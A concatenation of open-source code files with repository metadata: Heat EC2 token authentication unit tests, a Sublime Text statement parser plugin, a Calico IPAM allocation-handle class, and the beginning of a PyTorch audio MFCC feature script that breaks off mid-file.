req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
ok_resp = json.dumps({'access': {
'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}
},
'metadata': {'roles': ['aa', 'bb', 'cc']}}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=ok_resp)
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.assertEqual('aa,bb,cc', dummy_req.headers['X-Roles'])
self.m.VerifyAll()
def test_call_err_tokenid(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0/'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
err_msg = "EC2 access key not found."
err_resp = json.dumps({'error': {'message': err_msg}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=err_resp)
self.m.ReplayAll()
self.assertRaises(exception.HeatInvalidClientTokenIdError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_err_signature(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
err_msg = "EC2 signature not supplied."
err_resp = json.dumps({'error': {'message': err_msg}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=err_resp)
self.m.ReplayAll()
self.assertRaises(exception.HeatSignatureError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_err_denied(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
err_resp = json.dumps({})
self._stub_http_connection(headers={'Authorization': auth_str},
response=err_resp)
self.m.ReplayAll()
self.assertRaises(exception.HeatAccessDeniedError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_ok_v2(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_ok_multicloud(self):
dummy_conf = {
'allowed_auth_uris': [
'http://123:5000/v2.0', 'http://456:5000/v2.0'],
'multi_cloud': True
}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
err_msg = "EC2 access key not found."
err_resp = json.dumps({'error': {'message': err_msg}})
# first request fails
self._stub_http_connection(
req_url='http://123:5000/v2.0/ec2tokens',
response=err_resp,
params={'AWSAccessKeyId': 'foo'})
# second request passes
self._stub_http_connection(
req_url='http://456:5000/v2.0/ec2tokens',
response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_err_multicloud(self):
dummy_conf = {
'allowed_auth_uris': [
'http://123:5000/v2.0', 'http://456:5000/v2.0'],
'multi_cloud': True
}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
err_resp1 = json.dumps({})
err_msg2 = "EC2 access key not found."
err_resp2 = json.dumps({'error': {'message': err_msg2}})
# first request fails with HeatAccessDeniedError
self._stub_http_connection(
req_url='http://123:5000/v2.0/ec2tokens',
response=err_resp1,
params={'AWSAccessKeyId': 'foo'})
# second request fails with HeatInvalidClientTokenIdError
self._stub_http_connection(
req_url='http://456:5000/v2.0/ec2tokens',
response=err_resp2,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
# raised error matches last failure
self.assertRaises(exception.HeatInvalidClientTokenIdError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_err_multicloud_none_allowed(self):
dummy_conf = {
'allowed_auth_uris': [],
'multi_cloud': True
}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
self.m.ReplayAll()
self.assertRaises(exception.HeatAccessDeniedError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_badconf_no_authuri(self):
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
self.m.ReplayAll()
ex = self.assertRaises(exception.HeatInternalFailureError,
ec2.__call__, dummy_req)
self.assertEqual('Service misconfigured', six.text_type(ex))
self.m.VerifyAll()
def test_call_ok_auth_uri_ec2authtoken(self):
dummy_url = 'http://123:5000/v2.0'
cfg.CONF.set_default('auth_uri', dummy_url, group='ec2authtoken')
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_ok_auth_uri_ec2authtoken_long(self):
# Prove we tolerate a url which already includes the /ec2tokens path
dummy_url = 'http://123:5000/v2.0/ec2tokens'
cfg.CONF.set_default('auth_uri', dummy_url, group='ec2authtoken')
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_ok_auth_uri_ks_authtoken(self):
# Import auth_token to have keystone_authtoken settings setup.
importutils.import_module('keystonemiddleware.auth_token')
dummy_url = 'http://123:5000/v2.0'
cfg.CONF.set_override('auth_uri', dummy_url,
group='keystone_authtoken')
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_filter_factory(self):
ec2_filter = ec2token.EC2Token_filter_factory(global_conf={})
self.assertEqual('xyz', ec2_filter('xyz').application)
def test_filter_factory_none_app(self):
ec2_filter = ec2token.EC2Token_filter_factory(global_conf={})
self.assertEqual(None, ec2_filter(None).application)
| {
"content_hash": "5908281b74b076c2e8dcc03f99de4eea",
"timestamp": "",
"source": "github",
"line_count": 546,
"max_line_length": 77,
"avg_line_length": 41.556776556776555,
"alnum_prop": 0.5415601586602027,
"repo_name": "rdo-management/heat",
"id": "006dc1f922b7e5a60e5a64ba829b1a6c2d84e3a1",
"size": "23266",
"binary": false,
"copies": "3",
"ref": "refs/heads/mgt-master",
"path": "heat/tests/test_api_ec2token.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5970886"
},
{
"name": "Shell",
"bytes": "25070"
}
],
"symlink_target": ""
} |
import sublime
import sublime_plugin
import re
PATTERN = re.compile(
r'\s*(' +
  r'(\(|\[|\{|\)|\]|\})|' +
r'(\\?[\w$@]+[?!]?|\$)|' +
# double colon is for not ignoring colon at the end of string (php/python
# conflict)
r'(::|[^\w(){}\[\]])' +
r')\s*'
)
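# Group 2 of PATTERN captures brackets, group 3 captures identifier-like
# tokens (words and $/@-prefixed variables), and group 4 captures any other
# single delimiter character, with '::' kept whole so a trailing ':' is not
# mistaken for a statement delimiter.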
STATEMENT_OPEN = ['(', '{', '[']
STATEMENT_CLOSE = [')', '}', ']']
STATEMENT_DELIMETERS = [';', ':', '"', '\'', '(', ')', '[', ']', '{', '}']
STATEMENT_KEYS = {
False : {# forward
'open': STATEMENT_OPEN,
'close': STATEMENT_CLOSE,
},
True : {# backward
'open': STATEMENT_CLOSE,
'close': STATEMENT_OPEN,
}
}
BRACKETS = {
'(': ')',
'{': '}',
'[': ']',
')': '(',
'}': '{',
']': '[',
}
class State():
def __init__(self, view, region, text, backward, matches, statement):
self.view = view
self.strings = view.find_by_selector('string')
self.backward = backward
self.tokens = []
self.statement = statement
self.set_region(region, text, matches)
def set_region(self, region, text, matches):
self.region = region
self.text = text
self.matches = matches
self.index = 0
if matches != None:
self.last_index = len(matches) - 1
else:
self.last_index = None
def finish(self):
self.set_region(None, None, None)
def is_finished(self):
return self.region == None
def parse(view, point):
point = _shift_point(view, point)
if point == None:
return None
preceding, preceding_statement = _parse(view, point, True)
if len(preceding) == 0:
point = _shift_point_forward(view, point)
following, following_statement = _parse(view, point, False)
if len(following) > 0:
preceding, preceding_statement = _parse(view, following[0][0], True)
else:
point = _shift_point_backward(view, point)
preceding, preceding_statement = _parse(view, point, True)
if len(preceding) > 0:
following, following_statement = _parse(view, preceding[-1][1], False)
else:
following, following_statement = _parse(view, preceding[-1][1], False)
tokens = _join(view, preceding + following)
statement = [preceding_statement[0], following_statement[1]]
return tokens, statement
def _shift_point(view, point):
line = view.line(point)
if view.substr(line).strip() == '':
next_line, _ = _get_next_line(view, False, line)
if next_line == None:
return None
point = next_line.a
scope = view.scope_name(point)
if 'comment' in scope:
point = view.extract_scope(point).a
if 'string' in scope:
for region in view.find_by_selector('string'):
if region.a <= point and point <= region.b:
point = region.a
region = sublime.Region(view.line(point).a, point)
new_line_text = view.substr(region)
last_word = re.search(r'[$@\\]?[\w]+[?!]?(\.|->)?\s*$', new_line_text)
if last_word != None:
point = last_word.start(0) + region.a
return point
def _shift_point_backward(view, point):
region = sublime.Region(max(point - 32, 0), point)
new_line_text = view.substr(region)
last_word = re.search(r'[$@\\]?[\w]+[?!]?(\.|->)?\s*$', new_line_text)
if last_word != None:
point = last_word.start(0) + region.a
return point
def _shift_point_forward(view, point):
region = sublime.Region(point, min(point + 32, view.size()))
new_line_text = view.substr(region)
first_word = re.search(r'^\s*([$@]?[\w]+[?!]?)', new_line_text)
if first_word != None:
point = first_word.start(1) + region.a
else:
first_non_space = re.search(r'\S', new_line_text)
if first_non_space != None:
point = first_non_space.start(0) + region.a
return point
def _join(view, tokens):
if len(tokens) == 0:
return tokens
region = sublime.Region(tokens[0][0], tokens[-1][1])
text = view.substr(region)
index = 0
while index < len(tokens) - 1:
token = tokens[index]
next_token = tokens[index + 1]
delimeter = view.substr(sublime.Region(token[1], next_token[0]))
stripped = delimeter.strip()
join_required = (
delimeter == '' or
stripped == '::' or
stripped == '\\' or
stripped == '->' or (
stripped == '.' and (delimeter[0] == '.' or delimeter[-1] == '.')
)
)
if join_required:
tokens[index : index + 2] = [[token[0], next_token[1]]]
else:
index += 1
return tokens
def _parse(view, point, backward):
state = _create_initial_state(view, point, backward)
while True:
if state.is_finished():
break
if len(state.matches) == 0:
_advance(state)
continue
if _process_scope(state):
continue
if _process_nesting(state):
continue
match = state.matches[state.index]
scope_name = state.view.scope_name(match.start(1) + state.region.a)
if 'source' not in scope_name:
state.finish()
continue
_expand_statement(state)
if match.start(3) != -1:
token = [match.start(3) + state.region.a, match.end(3) + state.region.a]
first_char = match.group(3)[0]
is_token = (first_char == '@' or
first_char == '$' or (
'control' not in scope_name and
'operator' not in scope_name and
'storage' not in scope_name
))
if is_token:
state.tokens.append(token)
_advance(state)
if backward:
if len(state.tokens) > 0 and state.statement[1] > state.tokens[-1][0]:
state.statement[1] = state.tokens[-1][0]
state.tokens = list(reversed(state.tokens))
state.statement = list(reversed(state.statement))
else:
if len(state.tokens) > 0 and state.statement[1] < state.tokens[-1][1]:
state.statement[1] = state.tokens[-1][1]
return state.tokens, state.statement
def _expand_statement(state):
match = state.matches[state.index]
if match.group(1) == None:
return
close = STATEMENT_KEYS[state.backward]['close']
word = match.group(1).strip()
if word != '' and word not in close:
if state.backward:
state.statement[1] = state.region.a + match.start(1)
else:
state.statement[1] = state.region.a + match.end(1)
def _create_initial_state(view, point, backward):
region, text = _get_region_by_point(view, point, backward)
matches = _get_matches(text, backward, PATTERN)
state = State(view, region, text, backward, matches, [point, point])
return state
def _process_scope(state):
match = state.matches[state.index]
point = match.start(1) + state.region.a
scope_name = state.view.scope_name(point)
if ' string' in scope_name:
string = None
for region in state.strings:
if region.contains(point):
string = region
break
if string == None:
string = state.view.extract_scope(point)
state.tokens.append([string.a, string.b])
_ignore_region(state, string)
return True
elif 'comment' in scope_name:
region = state.view.extract_scope(point)
_ignore_region(state, region)
return True
return False
def _process_nesting(state):
# ruby block call hack
if _is_ruby_block(state):
return True
match = state.matches[state.index]
if match.start(2) == -1:
return False
keychars = STATEMENT_KEYS[state.backward]
if match.group(2) in keychars['close']:
state.finish()
return True
region = _get_nesting_region(state, match.group(2))
state.tokens.append([region.a, region.b])
_ignore_region(state, region)
return True
def _is_ruby_block(state):
match = state.matches[state.index]
if match.group(4) != '|':
return False
if state.backward:
operator = re.search(r'{\s*(\|)', state.text)
if operator != None and operator.start(1) == match.start(4):
state.finish()
return True
operator = re.search(r',\s*\w+\s*(\|)\s*$', state.text)
if operator != None and operator.start(1) == match.start(4):
state.finish()
return True
else:
operator = re.search(r',\s*\w+\s*(\|)\s*$', state.text)
if operator != None and operator.start(1) == match.start(4):
state.finish()
return True
return False
def _get_nesting_region(state, bracket):
nesting = 1
pattern = re.compile(re.escape(bracket) + '|' + re.escape(BRACKETS[bracket]))
point = state.region.a
if state.backward:
point += state.matches[state.index].start(2)
else:
point += state.matches[state.index].end(2)
region, text = _get_region_by_point(state.view, point, state.backward)
shift = region.a
matches = _get_matches(text, state.backward, pattern)
while True:
for match in matches:
scope_name = state.view.scope_name(match.start(0) + shift)
if ' string' in scope_name or ' comment' in scope_name:
continue
if match.group(0) == bracket:
nesting += 1
continue
nesting -= 1
if nesting == 0:
if state.backward:
end = state.matches[state.index].end(2) + state.region.a
start = match.start(0) + shift
else:
start = state.matches[state.index].start(2) + state.region.a
end = match.end(0) + shift
return sublime.Region(start, end)
region, text = _get_next_line(state.view, state.backward, region)
if region == None:
if state.backward:
return sublime.Region(0, point)
else:
return sublime.Region(point, state.view.size())
shift = region.a
matches = _get_matches(text, state.backward, pattern)
def _ignore_region(state, region):
point = None
if state.backward:
if region.a < state.region.a:
point = region.a
else:
if region.b > state.region.b:
point = region.b
if point != None:
region, text = _get_region_by_point(state.view, point, state.backward)
matches = _get_matches(text, state.backward, PATTERN)
state.set_region(region, text, matches)
else:
begin, end = region.begin(), region.end()
while True:
_advance(state)
if state.is_finished():
return
token_point = state.region.a + state.matches[state.index].start(1)
if token_point <= begin or end <= token_point:
if state.backward:
_advance(state)
break
def _advance(state):
if state.index == state.last_index or len(state.matches) == 0:
_parse_next_region(state)
else:
state.index += 1
def _get_region_by_point(view, point, backward):
line = view.line(point)
if backward:
region = sublime.Region(line.a, point)
else:
region = sublime.Region(point, line.b)
return region, view.substr(region)
def _parse_next_region(state):
region, text = _get_next_line(state.view, state.backward, state.region)
if region == None:
state.finish()
return
matches = _get_matches(text, state.backward, PATTERN)
if _is_statement_end_found(state, region, matches):
state.finish()
else:
state.set_region(region, text, matches)
def _is_statement_end_found(state, region, matches):
if _get_lines_delimeter(state, matches) != '':
return False
match = len(matches) > 0 and matches[0] or None
state_match = len(state.matches) > 0 and state.matches[-1] or None
is_operator = ((
match != None and
match.start(3) != -1 and
'operator' in state.view.scope_name(region.a + match.start(3)) and
match.group(3) != '$' # $ is not operator (js case); sublime, even don't think about it
) or (
state_match != None and
state_match.start(3) != -1 and
'operator' in state.view.scope_name(state.region.a +
state_match.start(3)) and
state_match.group(3) != '$' # $ is not operator (js case); sublime, even don't think about it
))
if is_operator:
return False
return True
def _get_lines_delimeter(state, next_matches):
delimeter = ''
current = len(state.matches) > 0 and state.matches[-1].group(4) or None
if current != None:
current = current.strip()
append = True
if state.backward and current == '\\':
append = False
if current in STATEMENT_DELIMETERS:
append = False
if append:
delimeter += current
following = len(next_matches) > 0 and next_matches[0].group(4) or None
if following != None:
following = following.strip()
if following not in STATEMENT_DELIMETERS:
delimeter += following
return delimeter
def _get_next_line(view, backward, line):
result, text = _get_next_line_info(view, backward, line)
while True:
if result == None:
break
    point = result.a + len(text) - len(text.lstrip())
stripped = text.strip()
is_comment_line = (
'comment' in view.scope_name(point) and
view.extract_scope(point).size() == len(stripped)
)
if text != None and stripped != '' and not is_comment_line:
break
result, text = _get_next_line_info(view, backward, result)
return result, text
def _get_next_line_info(view, backward, line):
if backward:
if line.a == 0:
return None, None
line = view.line(line.a - 1)
else:
if line.b == view.size():
return None, None
line = view.line(line.b + 1)
is_full_coment = (
'comment' in view.scope_name(line.a) and
view.extract_scope(line.a).contains(line)
)
if is_full_coment:
return None, None
text = view.substr(line)
return line, text
def _get_matches(text, backward, pattern):
matches = list(re.finditer(pattern, text))
if backward:
matches = list(reversed(matches))
return matches | {
"content_hash": "558176edeb452608bcf2eed6f086065f",
"timestamp": "",
"source": "github",
"line_count": 509,
"max_line_length": 97,
"avg_line_length": 26.18664047151277,
"alnum_prop": 0.6171505739365294,
"repo_name": "shagabutdinov/sublime-statement",
"id": "dc595e4427cc37fee37be84be087a042afe070f9",
"size": "13329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "33432"
}
],
"symlink_target": ""
} |
from netaddr import IPNetwork
import json
import logging
from pycalico import PyCalicoError
_log = logging.getLogger(__name__)
_log.addHandler(logging.NullHandler())
class AllocationHandle(object):
"""
An allocation handle tracks the blocks and number of addresses allocated
with a particular handle ID. This allows fast releasing of those IPs
using the handle ID.
"""
HANDLE_ID = "id"
BLOCK = "block"
def __init__(self, handle_id):
"""
:param handle_id: The ID for this handle, must be a string.
:return: AllocationHandle
"""
self.handle_id = handle_id
self.db_result = None
self.block = {}
"""
Stores the number of allocated addresses, by block CIDR.
"""
def to_json(self):
"""
Convert to a JSON representation for writing to etcd.
"""
json_dict = {AllocationHandle.HANDLE_ID: self.handle_id,
AllocationHandle.BLOCK: self.block}
return json.dumps(json_dict)
@classmethod
def from_etcd_result(cls, etcd_result):
"""
Convert a JSON representation into an instance of AllocationHandle.
"""
json_dict = json.loads(etcd_result.value)
handle_id = json_dict[AllocationHandle.HANDLE_ID]
handle = cls(handle_id)
handle.db_result = etcd_result
block = json_dict[AllocationHandle.BLOCK]
handle.block = block
return handle
def update_result(self):
"""
Return the EtcdResult with any changes to the object written to
result.value.
:return:
"""
self.db_result.value = self.to_json()
return self.db_result
def increment_block(self, block_cidr, num):
"""
Increment the address count for the given block.
:param block_cidr: Block ID as IPNetwork in CIDR format.
:param num: Amount to increment
:return: New count
"""
assert isinstance(block_cidr, IPNetwork)
block_id = str(block_cidr)
cur = self.block.get(block_id, 0)
new = cur + num
self.block[block_id] = new
return new
def decrement_block(self, block_cidr, num):
"""
Decrement the address count for the given block.
:param block_cidr: Block ID as IPNetwork in CIDR format.
:param num: Amount to decrement
:return: New count
"""
assert isinstance(block_cidr, IPNetwork)
block_id = str(block_cidr)
try:
cur = self.block[block_id]
except KeyError:
raise AddressCountTooLow("Tried to decrement block %s by %s, but "
"it isn't linked to handle %s" %
(block_id, num, self.handle_id))
else:
new = cur - num
if new < 0:
raise AddressCountTooLow("Tried to decrement block %s by %s, "
"but it only has %s addresses on"
" handle %s" % (block_id, num, cur,
self.handle_id))
if new == 0:
del self.block[block_id]
else:
self.block[block_id] = new
return new
def is_empty(self):
"""
Return True if there are no allocations, False otherwise.
"""
return len(self.block) == 0
class HandleError(PyCalicoError):
"""
Base error class for IPAM AllocationHandles.
"""
pass
class AddressCountTooLow(HandleError):
"""
Tried to decrement the address count for a block, but it was too low to
decrement without going below zero.
"""
pass
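# Minimal usage sketch (illustrative only; the handle id and CIDR below are
# made-up example values, not part of the original module).
if __name__ == "__main__":
    handle = AllocationHandle("example-handle-id")
    block = IPNetwork("192.168.0.0/26")
    handle.increment_block(block, 3)   # three addresses allocated in this block
    handle.decrement_block(block, 2)   # release two of them
    print(handle.to_json())            # e.g. {"id": "example-handle-id", "block": {"192.168.0.0/26": 1}}
    handle.decrement_block(block, 1)   # releasing the last address drops the block
    print(handle.is_empty())           # True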
| {
"content_hash": "ff7cd90d2164a4406254eead9b84a1d3",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 78,
"avg_line_length": 29.276923076923076,
"alnum_prop": 0.5559642669469259,
"repo_name": "caseydavenport/libcalico",
"id": "891989670e7a144f2c8108cbce2055e06789bbfb",
"size": "4414",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "calico_containers/pycalico/handle.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "2226"
},
{
"name": "Python",
"bytes": "499979"
}
],
"symlink_target": ""
} |
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.optim import lr_scheduler
import torch.utils.data as data
from torch.nn.utils.rnn import pack_padded_sequence as pack, pad_packed_sequence as unpack
import torchaudio
import torchaudio.transforms as tat
import numpy as np
import os
import glob
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from pytorch_audio_utils import *
parser = argparse.ArgumentParser(description='PyTorch Language ID Classifier Trainer')
parser.add_argument('--epochs', type=int, default=5,
help='upper epoch limit')
parser.add_argument('--batch-size', type=int, default=6,
help='batch size')
parser.add_argument('--window-size', type=int, default=200,
help='size of fft window')
parser.add_argument('--validate', action='store_true',
help='do out-of-bag validation')
parser.add_argument('--log-interval', type=int, default=5,
help='reports per epoch')
parser.add_argument('--load-model', type=str, default=None,
help='path of model to load')
parser.add_argument('--save-model', action='store_true',
help='path to save the final model')
parser.add_argument('--train-full-model', action='store_true',
help='train full model vs. final layer')
args = parser.parse_args()
class Preemphasis(object):
"""Perform preemphasis on signal
y = x[n] - α*x[n-1]
Args:
alpha (float): preemphasis coefficient
"""
def __init__(self, alpha=0.97):
self.alpha = alpha
def __call__(self, sig):
"""
Args:
sig (Tensor): Tensor of audio of size (Samples x Channels)
Returns:
sig (Tensor): Preemphasized. See equation above.
"""
if self.alpha == 0:
return sig
else:
sig[1:, :] -= self.alpha * sig[:-1, :]
return sig
class RfftPow(object):
"""This function emulates power of the discrete fourier transform.
Note: this implementation may not be numerically stable
Args:
K (int): number of fft freq bands
"""
def __init__(self, K=None):
self.K = K
def __call__(self, sig):
"""
Args:
sig (Tensor): Tensor of audio of size (Samples x Channels)
Returns:
S (Tensor): spectrogram
"""
N = sig.size(1)
if self.K is None:
K = N
else:
K = self.K
k_vec = torch.arange(0, K).unsqueeze(0)
n_vec = torch.arange(0, N).unsqueeze(1)
angular_pt = 2 * np.pi * k_vec * n_vec / K
S = torch.sqrt(torch.matmul(sig, angular_pt.cos())**2 + \
torch.matmul(sig, angular_pt.sin())**2)
S = S.squeeze()[:(K//2+1)]
S = (1 / K) * S**2
return S
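# In effect, RfftPow computes the one-sided periodogram
#   S[k] = (1/K) * |sum_n x[n] * exp(-1j*2*pi*k*n/K)|**2,  k = 0..K//2,
# by building the cos/sin basis explicitly instead of calling an FFT routine.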
class FilterBanks(object):
"""Bins a periodogram from K fft frequency bands into N bins (banks)
fft bands (K//2+1) -> filterbanks (n_filterbanks) -> bins (bins)
Args:
n_filterbanks (int): number of filterbanks
bins (list): number of bins
"""
def __init__(self, n_filterbanks, bins):
self.n_filterbanks = n_filterbanks
self.bins = bins
def __call__(self, S):
"""
Args:
S (Tensor): Tensor of Spectro- / Periodogram
Returns:
fb (Tensor): binned filterbanked spectrogram
"""
conversion_factor = np.log(10) # torch.log10 doesn't exist
K = S.size(0)
fb_mat = torch.zeros((self.n_filterbanks, K))
for m in range(1, self.n_filterbanks+1):
f_m_minus = int(self.bins[m - 1])
f_m = int(self.bins[m])
f_m_plus = int(self.bins[m + 1])
fb_mat[m - 1, f_m_minus:f_m] = (torch.arange(f_m_minus, f_m) - f_m_minus) / (f_m - f_m_minus)
fb_mat[m - 1, f_m:f_m_plus] = (f_m_plus - torch.arange(f_m, f_m_plus)) / (f_m_plus - f_m)
fb = torch.matmul(S, fb_mat.t())
fb = 20 * torch.log(fb) / conversion_factor
return fb
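# fb_mat above holds triangular filters whose edges come from the `bins`
# array (mel-spaced FFT bin indices, computed further below); the last line
# converts the filterbank energies to decibels (20*log10).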
class MFCC(object):
"""Discrete Cosine Transform
There are three types of the DCT. This is 'Type 2' as described in the scipy docs.
filterbank bins (bins) -> mfcc (mfcc)
Args:
n_filterbanks (int): number of filterbanks
n_coeffs (int): number of mfc coefficients to keep
mode (str): orthogonal transformation
"""
def __init__(self, n_filterbanks, n_coeffs, mode="ortho"):
self.n_filterbanks = n_filterbanks
self.n_coeffs = n_coeffs
self.mode = "ortho"
def __call__(self, fb):
"""
Args:
fb (Tensor): Tensor of binned filterbanked spectrogram
Returns:
mfcc (Tensor): Tensor of mfcc coefficients
"""
K = self.n_filterbanks
k_vec = torch.arange(0, K).unsqueeze(0)
n_vec = torch.arange(0, self.n_filterbanks).unsqueeze(1)
angular_pt = np.pi * k_vec * ((2*n_vec+1) / (2*K))
mfcc = 2 * torch.matmul(fb, angular_pt.cos())
if self.mode == "ortho":
mfcc[0] *= np.sqrt(1/(4*self.n_filterbanks))
mfcc[1:] *= np.sqrt(1/(2*self.n_filterbanks))
return mfcc[1:(self.n_coeffs+1)]
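# Equivalent formulation: a DCT-II of the log filterbank energies,
#   c[k] = 2 * sum_n fb[n] * cos(pi*k*(2n+1)/(2K)),  K = n_filterbanks,
# with orthonormal scaling, keeping coefficients 1..n_coeffs and dropping c[0].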
class Sig2Features(object):
"""Get the log power, MFCCs and 1st derivatives of the signal across n hops
and concatenate all that together
Args:
        ws (int): window size in samples
        hs (int): hop size in samples (frame step)
transformDict (dict): dict of transformations for each hop
"""
def __init__(self, ws, hs, transformDict):
self.ws = ws
self.hs = hs
self.td = transformDict
def __call__(self, sig):
"""
Args:
sig (Tensor): Tensor of signal
Returns:
Feats (Tensor): Tensor of log-power, 12 mfcc coefficients and 1st devs
"""
        n_hops = (sig.size(0) - self.ws) // self.hs
P = []
Mfcc = []
for i in range(n_hops):
# create frame
            st = int(i * self.hs)
            end = st + self.ws
sig_n = sig[st:end]
# get power/energy
P += [self.td["RfftPow"](sig_n.transpose(0, 1))]
# get mfccs and filter banks
fb = self.td["FilterBanks"](P[-1])
Mfcc += [self.td["MFCC"](fb)]
# concat and calculate derivatives
P = torch.stack(P, 1)
P_sum = torch.log(P.sum(0))
P_dev = torch.zeros(P_sum.size())
P_dev[1:] = P_sum[1:] - P_sum[:-1]
Mfcc = torch.stack(Mfcc, 1)
Mfcc_dev = torch.cat((torch.zeros(n_coefficients, 1), Mfcc[:,:-1] - Mfcc[:,1:]), 1)
Feats = torch.cat((P_sum.unsqueeze(0), P_dev.unsqueeze(0), Mfcc, Mfcc_dev), 0)
return Feats
class Labeler(object):
"""Labels from text to int + 1
"""
def __call__(self, labels):
return torch.LongTensor([int(l)+1 for l in labels])
def pad_packed_collate(batch):
